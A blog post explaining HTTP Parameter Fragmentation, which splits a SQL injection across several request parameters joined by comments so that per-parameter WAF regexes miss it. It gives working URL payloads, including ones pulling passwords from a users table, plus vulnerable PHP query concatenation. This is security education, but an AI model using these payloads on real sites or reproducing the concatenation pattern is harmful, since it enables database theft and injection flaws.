HTTP Parameter Fragmentation (HPF) is one of the methods to bypass security filters in web applications

The idea to use HTTP Parameter Fragmentation (HPF) when calling a web application for the purpose of bypassing security filters (particularly, WAFs) is not a new one. According to one of the participants of WASC Mailing List, this technique can be occasionally found among exploits published at the site milw0rm.com. However, application of this method allows one to successfully bypass filters used in most modern WAFs (particularly, a productive one – mod_security). So, what is the essence of this technique? Let us consider it by examples of SQL Injection exploitation.

It is often necessary to have two or more user parameters in one SQL query, for example:

Query(\”select * from table where a=\”.$_REQUEST [\’a\’].\” and b>\”.$_REQUEST [\’b\’]);
Query(\”select * from table where a=\”.$_REQUEST [\’a\’].\” and b<".$_REQUEST ['b']." limit ".$_REQUEST['c']);
etc.

At the stage of verifying the parameter values received from the user on the level of web application, the application is capable of operating with variables of web server only and WAF (depending on the mode) is capable of operating directly with raw HTTP data. However, regardless of the method of accessing data, it comes to using certain regular expressions (regexps) for each separate parameter. I.e.:

preg_match(\”/(uni)(on.+sel)(ect)/is\”, $_REQUEST [\’a\’])
preg_match(\”/(uni)(on.+sel)(ect)/is\”, $_REQUEST [\’b\’])
preg_match(\”/(uni)(on.+sel)(ect)/is\”, $_REQUEST [\’c\’])

preg_match(\”/(sel)(ect.+fr)(om)/is\”, $_REQUEST [\’a\’])
preg_match(\”/(sel)(ect.+fr)(om)/is\”, $_REQUEST [\’b\’])
preg_match(\”/(sel)(ect.+fr)(om)/is\”, $_REQUEST [\’c\’])


Thus, if one divides the logic of the SQL query among several parameters that enter this SQL query and then concatenates these pieces using comments, it will become possible to bypass the described filters:

/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users

Here, regexps will not work:

preg_match(\”/(uni)(on.+sel)(ect)/is\”, \”1+union/*\”) = false
preg_match(\”/(uni)(on.+sel)(ect)/is\”, \”*/select+1,2\”) = false

preg_match(\”/(sel)(ect.+fr)(om)/is\”, \”*/from+users\”) = false

SQL queries become:

Query(\”select * from table where a=1 union/* and b>*/select 1,2\”);
Query(\”select * from table where a=1 union/* and b<*/select 1,pass/* limit */from users");

Since comments are ignored, the queries in fact are:

select * from table where a=1 union select 1,2
select * from table where a=1 union select 1,pass from users

One can notice that considering the attack vector, HPF is very similar to HPP (HTTP Parameter Pollution), but in contrast to the latter one, the HPP implementation is aimed at exploitation of vulnerability in the web application, not in the application environment. Of course, both attack methods can supplement each other.
For example, combination of two techniques can be used if SQL code is sequentially injected into two SQL queries:

Query(\”select id,user,email from table where a=\”.$_REQUEST [\’a\’].\” limit \”.$_REQUEST [\’b\’]);
Query(\”select id,user from table where a=\”.$_REQUEST [\’a\’]);

Let us assume that output is displayed only if both queries don’t return a DB error. Then it becomes possible to combine HPP and HPF methods and use “union” instead of

Blind SQL Injection. Here is an example:

/?a=1+union/*&a=*/select+1,2/*&b=*/,3

SQL queries will take on a correct form:

select id,user,email from table where a=1 union select 1,2,3
select id,user from table where a=1 union select 1,2

Sources:
antichat: http://forum.antichat.ru/showpost.php?p=911841&postcount=2
antichat: http://forum.antichat.ru/showpost.php?p=970729&postcount=3
OWASP EU09 Luca Carettoni, Stefano diPaola http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
Lavakumar Kuppan, http://lavakumar.com/Split_and_Join.pdf
WASC Mailing List, http://www.webappsec.org/lists/websecurity/archive/2009-08/msg00080.html
CC09 Dmitry Evteev, http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
Dmitry Evteev blog, http://devteev.blogspot.com/2009/09/http-parameter-fragmentation-hpf-web.html

2 thoughts on “HTTP Parameter Fragmentation (HPF) is one of the methods to bypass security filters in web applications

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.